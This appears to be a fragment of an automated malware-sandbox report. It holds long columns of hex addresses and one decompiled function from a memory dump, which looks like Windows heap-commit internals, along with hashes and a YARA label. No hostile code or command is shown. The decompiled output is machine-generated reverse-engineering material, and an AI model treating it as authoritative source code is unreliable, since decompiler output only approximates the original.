                                                                                                        0x00b31589
                                                                                                        0x00b3158b
                                                                                                        0x00b31592
                                                                                                        0x00b31593
                                                                                                        0x00b31593
                                                                                                        0x00b31589
                                                                                                        0x00b31530
                                                                                                        0x00000000
                                                                                                        0x00b314f8
                                                                                                        0x00b314d5
                                                                                                        0x00b314da
                                                                                                        0x00b314dc
                                                                                                        0x00000000
                                                                                                        0x00b314de
                                                                                                        0x00b314e8
                                                                                                        0x00000000
                                                                                                        0x00b314e8
                                                                                                        0x00b31497
                                                                                                        0x00b31497
                                                                                                        0x00b314a4
                                                                                                        0x00b314a4
                                                                                                        0x00b314a7
                                                                                                        0x00b314a9
                                                                                                        0x00b314ab
                                                                                                        0x00b314ab
                                                                                                        0x00b3149c
                                                                                                        0x00b3149e
                                                                                                        0x00b314a0
                                                                                                        0x00b314b0
                                                                                                        0x00b314b0
                                                                                                        0x00000000
                                                                                                        0x00b314a2
                                                                                                        0x00b314a2
                                                                                                        0x00000000
                                                                                                        0x00b314a2
                                                                                                        0x00b314a0
                                                                                                        0x00b314b3
                                                                                                        0x00b314bb
                                                                                                        0x00000000
                                                                                                        0x00b314bb
                                                                                                        0x00b31495
                                                                                                        0x00ae9a7c
                                                                                                        0x00ae9a7c
                                                                                                        0x00ae9a7f
                                                                                                        0x00ae9a7f
                                                                                                        0x00ae9a82
                                                                                                        0x00ae9a84
                                                                                                        0x00ae9a87
                                                                                                        0x00ae9a8a
                                                                                                        0x00ae9a8d
                                                                                                        0x00ae9a8f
                                                                                                        0x00b3166a
                                                                                                        0x00b3166a
                                                                                                        0x00b3166b
                                                                                                        0x00b31674
                                                                                                        0x00000000
                                                                                                        0x00b31674
                                                                                                        0x00ae9a95
                                                                                                        0x00ae9a97
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ae9aa0
                                                                                                        0x00ae9aa3
                                                                                                        0x00ae9aa9
                                                                                                        0x00ae9aab
                                                                                                        0x00ae9ad7
                                                                                                        0x00ae9ad7
                                                                                                        0x00ae9ada
                                                                                                        0x00ae9add
                                                                                                        0x00ae9adf
                                                                                                        0x00ae9ae2
                                                                                                        0x00ae9ae6
                                                                                                        0x00ae9b22
                                                                                                        0x00ae9b27
                                                                                                        0x00ae9b29
                                                                                                        0x00000000
                                                                                                        0x00ae9b2b
                                                                                                        0x00b315be
                                                                                                        0x00000000
                                                                                                        0x00b315be
                                                                                                        0x00ae9b29
                                                                                                        0x00ae9ae8
                                                                                                        0x00ae9ae8
                                                                                                        0x00ae9aeb
                                                                                                        0x00ae9aee
                                                                                                        0x00b315cb
                                                                                                        0x00b315d2
                                                                                                        0x00b315d5
                                                                                                        0x00b315d7
                                                                                                        0x00b315da
                                                                                                        0x00b315dc
                                                                                                        0x00b315dc
                                                                                                        0x00b315dc
                                                                                                        0x00b315da
                                                                                                        0x00b315e5
                                                                                                        0x00b315e9
                                                                                                        0x00b315ee
                                                                                                        0x00b315f1
                                                                                                        0x00b315f3
                                                                                                        0x00b315f9
                                                                                                        0x00b31600
                                                                                                        0x00b31604
                                                                                                        0x00b31624
                                                                                                        0x00b31629
                                                                                                        0x00b31606
                                                                                                        0x00b3161c
                                                                                                        0x00b31621
                                                                                                        0x00b31637
                                                                                                        0x00b3163e
                                                                                                        0x00b31643
                                                                                                        0x00b31649
                                                                                                        0x00b3164c
                                                                                                        0x00b31650
                                                                                                        0x00b31656
                                                                                                        0x00b3165d
                                                                                                        0x00b3165e
                                                                                                        0x00b3165e
                                                                                                        0x00b31650
                                                                                                        0x00b315f3
                                                                                                        0x00ae9af4
                                                                                                        0x00ae9af7
                                                                                                        0x00ae9afc
                                                                                                        0x00ae9b00
                                                                                                        0x00ae9b04
                                                                                                        0x00ae9b08
                                                                                                        0x00ae9b14
                                                                                                        0x00ae99fe
                                                                                                        0x00ae9a04
                                                                                                        0x00ae9a07
                                                                                                        0x00000000
                                                                                                        0x00ae9a29
                                                                                                        0x00b3169c
                                                                                                        0x00b316a0
                                                                                                        0x00b316a5
                                                                                                        0x00b316a9
                                                                                                        0x00b316b5
                                                                                                        0x00b316ba
                                                                                                        0x00b316bc
                                                                                                        0x00b316be
                                                                                                        0x00b316c3
                                                                                                        0x00b316c3
                                                                                                        0x00b316bc
                                                                                                        0x00b316c8
                                                                                                        0x00b316cc
                                                                                                        0x00b3181b
                                                                                                        0x00b3181b
                                                                                                        0x00b3181e
                                                                                                        0x00b3181e
                                                                                                        0x00b31821
                                                                                                        0x00b31823
                                                                                                        0x00b31826
                                                                                                        0x00b31829
                                                                                                        0x00b3182c
                                                                                                        0x00b3182e
                                                                                                        0x00b31688
                                                                                                        0x00b31688
                                                                                                        0x00b31689
                                                                                                        0x00b3168b
                                                                                                        0x00b3168c
                                                                                                        0x00b3168d
                                                                                                        0x00b3168f
                                                                                                        0x00b31692
                                                                                                        0x00000000
                                                                                                        0x00b31692
                                                                                                        0x00b31834
                                                                                                        0x00b31836
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b3183f
                                                                                                        0x00b31842
                                                                                                        0x00b31848
                                                                                                        0x00b3184a
                                                                                                        0x00b31875
                                                                                                        0x00b31875
                                                                                                        0x00b31878
                                                                                                        0x00b3187b
                                                                                                        0x00b3187d
                                                                                                        0x00b31880
                                                                                                        0x00b31884
                                                                                                        0x00b318a7
                                                                                                        0x00b318a7
                                                                                                        0x00b318aa
                                                                                                        0x00b318ad
                                                                                                        0x00b318b6
                                                                                                        0x00b318bd
                                                                                                        0x00b318c0
                                                                                                        0x00b318c3
                                                                                                        0x00b318c5
                                                                                                        0x00b318c8
                                                                                                        0x00b318ca
                                                                                                        0x00b318ca
                                                                                                        0x00b318cd
                                                                                                        0x00b318cd
                                                                                                        0x00b318c8
                                                                                                        0x00b318d5
                                                                                                        0x00b318da
                                                                                                        0x00b318df
                                                                                                        0x00b318e2
                                                                                                        0x00b318e5
                                                                                                        0x00b318e7
                                                                                                        0x00b318ee
                                                                                                        0x00b318f2
                                                                                                        0x00b31912
                                                                                                        0x00b31917
                                                                                                        0x00b318f4
                                                                                                        0x00b3190a
                                                                                                        0x00b3190f
                                                                                                        0x00b31925
                                                                                                        0x00b3192c
                                                                                                        0x00b31931
                                                                                                        0x00b3193a
                                                                                                        0x00b3193e
                                                                                                        0x00b31940
                                                                                                        0x00b31947
                                                                                                        0x00b31948
                                                                                                        0x00b31948
                                                                                                        0x00b3193e
                                                                                                        0x00b318e5
                                                                                                        0x00b3194f
                                                                                                        0x00b31952
                                                                                                        0x00b31956
                                                                                                        0x00b3195d
                                                                                                        0x00b31961
                                                                                                        0x00b3196d
                                                                                                        0x00000000
                                                                                                        0x00b3196d
                                                                                                        0x00b3188a
                                                                                                        0x00b3188f
                                                                                                        0x00b31891
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b3189d
                                                                                                        0x00000000
                                                                                                        0x00b3189d
                                                                                                        0x00b3184c
                                                                                                        0x00b31859
                                                                                                        0x00b31859
                                                                                                        0x00b3185c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b31851
                                                                                                        0x00b31853
                                                                                                        0x00b31855
                                                                                                        0x00b31865
                                                                                                        0x00b31865
                                                                                                        0x00b31866
                                                                                                        0x00b31868
                                                                                                        0x00b31870
                                                                                                        0x00000000
                                                                                                        0x00b31870
                                                                                                        0x00b31857
                                                                                                        0x00b31857
                                                                                                        0x00b3185e
                                                                                                        0x00000000
                                                                                                        0x00b316d2
                                                                                                        0x00b316d2
                                                                                                        0x00b316d5
                                                                                                        0x00b316d5
                                                                                                        0x00b316d8
                                                                                                        0x00b316da
                                                                                                        0x00b316dd
                                                                                                        0x00b316e0
                                                                                                        0x00b316e3
                                                                                                        0x00b316e5
                                                                                                        0x00b31808
                                                                                                        0x00b31808
                                                                                                        0x00b31809
                                                                                                        0x00b31812
                                                                                                        0x00b31817
                                                                                                        0x00b31817
                                                                                                        0x00000000
                                                                                                        0x00b31817
                                                                                                        0x00b316eb
                                                                                                        0x00b316ed
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b316f6
                                                                                                        0x00b316f9
                                                                                                        0x00b316ff
                                                                                                        0x00b31701
                                                                                                        0x00b3172c
                                                                                                        0x00b3172c
                                                                                                        0x00b3172f
                                                                                                        0x00b31732
                                                                                                        0x00b31734
                                                                                                        0x00b31737
                                                                                                        0x00b3173b
                                                                                                        0x00b3175e
                                                                                                        0x00b3175e
                                                                                                        0x00b31761
                                                                                                        0x00b31764
                                                                                                        0x00b3176d
                                                                                                        0x00b31774
                                                                                                        0x00b31777
                                                                                                        0x00b3177a
                                                                                                        0x00b3177c
                                                                                                        0x00b3177f
                                                                                                        0x00b31781
                                                                                                        0x00b31781
                                                                                                        0x00b31784
                                                                                                        0x00b31784
                                                                                                        0x00b3177f
                                                                                                        0x00b3178c
                                                                                                        0x00b31791
                                                                                                        0x00b31796
                                                                                                        0x00b31799
                                                                                                        0x00b3179c
                                                                                                        0x00b3179e
                                                                                                        0x00b317a5
                                                                                                        0x00b317a9
                                                                                                        0x00b317c9
                                                                                                        0x00b317ce
                                                                                                        0x00b317ab
                                                                                                        0x00b317c1
                                                                                                        0x00b317c6
                                                                                                        0x00b317dc
                                                                                                        0x00b317e3
                                                                                                        0x00b317e8
                                                                                                        0x00b317ee
                                                                                                        0x00b317f1
                                                                                                        0x00b317f5
                                                                                                        0x00b317f7
                                                                                                        0x00b317fe
                                                                                                        0x00b317ff
                                                                                                        0x00b317ff
                                                                                                        0x00b317f5
                                                                                                        0x00b3179c
                                                                                                        0x00000000
                                                                                                        0x00b31764
                                                                                                        0x00b31741
                                                                                                        0x00b31746
                                                                                                        0x00b31748
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b31754
                                                                                                        0x00000000
                                                                                                        0x00b31754
                                                                                                        0x00b31703
                                                                                                        0x00b31710
                                                                                                        0x00b31710
                                                                                                        0x00b31713
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b31708
                                                                                                        0x00b3170a
                                                                                                        0x00b3170c
                                                                                                        0x00b3171c
                                                                                                        0x00b3171c
                                                                                                        0x00b3171d
                                                                                                        0x00b3171f
                                                                                                        0x00b31727
                                                                                                        0x00000000
                                                                                                        0x00b31727
                                                                                                        0x00b3170e
                                                                                                        0x00b3170e
                                                                                                        0x00b31715
                                                                                                        0x00000000
                                                                                                        0x00b31715
                                                                                                        0x00b316cc
                                                                                                        0x00ae9a45
                                                                                                        0x00ae9a45
                                                                                                        0x00ae9a0e
                                                                                                        0x00ae9a1c
                                                                                                        0x00ae9a23
                                                                                                        0x00b3167e
                                                                                                        0x00b3167f
                                                                                                        0x00b31681
                                                                                                        0x00b31683
                                                                                                        0x00b31684
                                                                                                        0x00000000
                                                                                                        0x00b31684
                                                                                                        0x00000000
                                                                                                        0x00ae9aad
                                                                                                        0x00ae9aad
                                                                                                        0x00ae9ab0
                                                                                                        0x00ae9ab3
                                                                                                        0x00ae9ab3
                                                                                                        0x00ae9ab6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ae9ab8
                                                                                                        0x00ae9aba
                                                                                                        0x00ae9abc
                                                                                                        0x00ae9ac8
                                                                                                        0x00ae9ac8
                                                                                                        0x00000000
                                                                                                        0x00ae9abe
                                                                                                        0x00ae9abe
                                                                                                        0x00ae9ac0
                                                                                                        0x00000000
                                                                                                        0x00ae9ac0
                                                                                                        0x00ae9abc
                                                                                                        0x00ae9ad2
                                                                                                        0x00000000
                                                                                                        0x00ae9ad2
                                                                                                        0x00ae9aab

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                        • API String ID: 0-3178619729
                                                                                                        • Opcode ID: 4e92502948277d909bdad7ac2af8410139e50df88dec83f8588a576b59a6dd91
                                                                                                        • Instruction ID: 883a24a4cba82bbe1408ef656440536af75f8db754c454378e5a3260c8f90803
                                                                                                        • Opcode Fuzzy Hash: 4e92502948277d909bdad7ac2af8410139e50df88dec83f8588a576b59a6dd91
                                                                                                        • Instruction Fuzzy Hash: BC22E1706002419FDB25CF2DC896B7AB7F9EF45704F2889A9E4468B382E775EC85CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AEB477, Relevance: 4.2, Strings: 3, Instructions: 405COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 67%
                                                                                                        			E00AEB477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0xbbd360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E00AEB8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E00B0B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0xbb8748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E00ACB150();
						} else {
							E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E00ACB150();
						__eflags =  *0xbb7bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E00B82073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0xbb8a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0xbbb1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E00B09730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E00B8A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E00B09660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E00B8138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E00B7FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E00B8A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E00B8A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E00AE7D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E00B81582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E00AE7D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E00B81582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E00AEB73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E00AEBC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E00B8A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}





















































                                                                                                        0x00aeb486
                                                                                                        0x00aeb48a
                                                                                                        0x00aeb48e
                                                                                                        0x00aeb491
                                                                                                        0x00aeb493
                                                                                                        0x00aeb49a
                                                                                                        0x00aeb49c
                                                                                                        0x00aeb4a2
                                                                                                        0x00aeb4a7
                                                                                                        0x00aeb6fc
                                                                                                        0x00aeb6fc
                                                                                                        0x00aeb6b3
                                                                                                        0x00aeb6c3
                                                                                                        0x00aeb6c3
                                                                                                        0x00aeb4b4
                                                                                                        0x00b3294f
                                                                                                        0x00b32951
                                                                                                        0x00b32957
                                                                                                        0x00b3295d
                                                                                                        0x00b32961
                                                                                                        0x00b32980
                                                                                                        0x00b32985
                                                                                                        0x00b32963
                                                                                                        0x00b32978
                                                                                                        0x00b3297d
                                                                                                        0x00b3298b
                                                                                                        0x00b32990
                                                                                                        0x00b32995
                                                                                                        0x00b3299d
                                                                                                        0x00b329a1
                                                                                                        0x00b329a2
                                                                                                        0x00b329a2
                                                                                                        0x00b329a7
                                                                                                        0x00b329a7
                                                                                                        0x00b32951
                                                                                                        0x00aeb4ba
                                                                                                        0x00aeb4ba
                                                                                                        0x00aeb4bd
                                                                                                        0x00aeb4c2
                                                                                                        0x00aeb6d4
                                                                                                        0x00aeb4c8
                                                                                                        0x00aeb4c8
                                                                                                        0x00aeb4c8
                                                                                                        0x00aeb4cd
                                                                                                        0x00aeb4d0
                                                                                                        0x00aeb4d9
                                                                                                        0x00aeb4df
                                                                                                        0x00aeb4e2
                                                                                                        0x00b329b7
                                                                                                        0x00b329bd
                                                                                                        0x00000000
                                                                                                        0x00aeb4e8
                                                                                                        0x00aeb4e8
                                                                                                        0x00aeb4ef
                                                                                                        0x00aeb4fa
                                                                                                        0x00aeb703
                                                                                                        0x00aeb709
                                                                                                        0x00aeb70b
                                                                                                        0x00aeb711
                                                                                                        0x00aeb711
                                                                                                        0x00aeb70b
                                                                                                        0x00aeb503
                                                                                                        0x00aeb50c
                                                                                                        0x00aeb511
                                                                                                        0x00aeb514
                                                                                                        0x00aeb519
                                                                                                        0x00b329c5
                                                                                                        0x00b329c7
                                                                                                        0x00b329cc
                                                                                                        0x00b329cd
                                                                                                        0x00b329cf
                                                                                                        0x00b329d0
                                                                                                        0x00b329d2
                                                                                                        0x00b329d7
                                                                                                        0x00b329d9
                                                                                                        0x00b329ee
                                                                                                        0x00b329ee
                                                                                                        0x00b329f4
                                                                                                        0x00b329fa
                                                                                                        0x00b32a01
                                                                                                        0x00000000
                                                                                                        0x00b32a01
                                                                                                        0x00b329db
                                                                                                        0x00b329df
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b329e1
                                                                                                        0x00b329e4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b329e6
                                                                                                        0x00b329e6
                                                                                                        0x00aeb51f
                                                                                                        0x00aeb51f
                                                                                                        0x00aeb520
                                                                                                        0x00aeb525
                                                                                                        0x00aeb52b
                                                                                                        0x00aeb52d
                                                                                                        0x00aeb52e
                                                                                                        0x00aeb530
                                                                                                        0x00aeb535
                                                                                                        0x00aeb53b
                                                                                                        0x00aeb53d
                                                                                                        0x00b32a07
                                                                                                        0x00000000
                                                                                                        0x00b32a07
                                                                                                        0x00aeb549
                                                                                                        0x00aeb54e
                                                                                                        0x00b32a12
                                                                                                        0x00b32a15
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b32a24
                                                                                                        0x00aeb559
                                                                                                        0x00aeb55c
                                                                                                        0x00b32a34
                                                                                                        0x00b32a3b
                                                                                                        0x00b32a4d
                                                                                                        0x00b32a4d
                                                                                                        0x00b32a3b
                                                                                                        0x00aeb566
                                                                                                        0x00aeb56b
                                                                                                        0x00aeb56f
                                                                                                        0x00aeb57b
                                                                                                        0x00aeb582
                                                                                                        0x00b32a57
                                                                                                        0x00b32a5c
                                                                                                        0x00b32a5c
                                                                                                        0x00aeb582
                                                                                                        0x00aeb58b
                                                                                                        0x00aeb58e
                                                                                                        0x00aeb592
                                                                                                        0x00aeb596
                                                                                                        0x00aeb599
                                                                                                        0x00aeb59b
                                                                                                        0x00aeb59e
                                                                                                        0x00aeb5a3
                                                                                                        0x00aeb5a6
                                                                                                        0x00aeb5a9
                                                                                                        0x00b32a66
                                                                                                        0x00b32a67
                                                                                                        0x00b32a73
                                                                                                        0x00b32a78
                                                                                                        0x00aeb5b8
                                                                                                        0x00aeb5b8
                                                                                                        0x00aeb5bb
                                                                                                        0x00aeb5bd
                                                                                                        0x00aeb5bd
                                                                                                        0x00aeb5c4
                                                                                                        0x00aeb5f7
                                                                                                        0x00aeb5f7
                                                                                                        0x00aeb600
                                                                                                        0x00aeb606
                                                                                                        0x00aeb60c
                                                                                                        0x00aeb612
                                                                                                        0x00aeb618
                                                                                                        0x00aeb621
                                                                                                        0x00aeb623
                                                                                                        0x00aeb629
                                                                                                        0x00aeb629
                                                                                                        0x00aeb62c
                                                                                                        0x00aeb62f
                                                                                                        0x00aeb633
                                                                                                        0x00aeb636
                                                                                                        0x00aeb639
                                                                                                        0x00aeb71d
                                                                                                        0x00aeb720
                                                                                                        0x00aeb736
                                                                                                        0x00aeb660
                                                                                                        0x00aeb660
                                                                                                        0x00aeb662
                                                                                                        0x00aeb665
                                                                                                        0x00aeb66a
                                                                                                        0x00aeb6e6
                                                                                                        0x00aeb6e7
                                                                                                        0x00aeb6ea
                                                                                                        0x00aeb6ef
                                                                                                        0x00b32ad1
                                                                                                        0x00b32ad2
                                                                                                        0x00b32ad8
                                                                                                        0x00b32add
                                                                                                        0x00b32add
                                                                                                        0x00aeb6f5
                                                                                                        0x00aeb6f5
                                                                                                        0x00aeb672
                                                                                                        0x00aeb675
                                                                                                        0x00aeb67a
                                                                                                        0x00b32ae5
                                                                                                        0x00b32ae8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b32af4
                                                                                                        0x00b32afc
                                                                                                        0x00000000
                                                                                                        0x00aeb680
                                                                                                        0x00aeb680
                                                                                                        0x00aeb680
                                                                                                        0x00aeb685
                                                                                                        0x00aeb687
                                                                                                        0x00aeb68a
                                                                                                        0x00b32b06
                                                                                                        0x00b32b0c
                                                                                                        0x00b32b13
                                                                                                        0x00b32b1e
                                                                                                        0x00b32b20
                                                                                                        0x00b32b2b
                                                                                                        0x00b32b2b
                                                                                                        0x00b32b2b
                                                                                                        0x00b32b34
                                                                                                        0x00b32b45
                                                                                                        0x00b32b45
                                                                                                        0x00b32b13
                                                                                                        0x00aeb696
                                                                                                        0x00aeb69b
                                                                                                        0x00aeb6a0
                                                                                                        0x00b32b4f
                                                                                                        0x00b32b52
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b32b61
                                                                                                        0x00000000
                                                                                                        0x00aeb6a6
                                                                                                        0x00aeb6a6
                                                                                                        0x00aeb6a6
                                                                                                        0x00aeb6a8
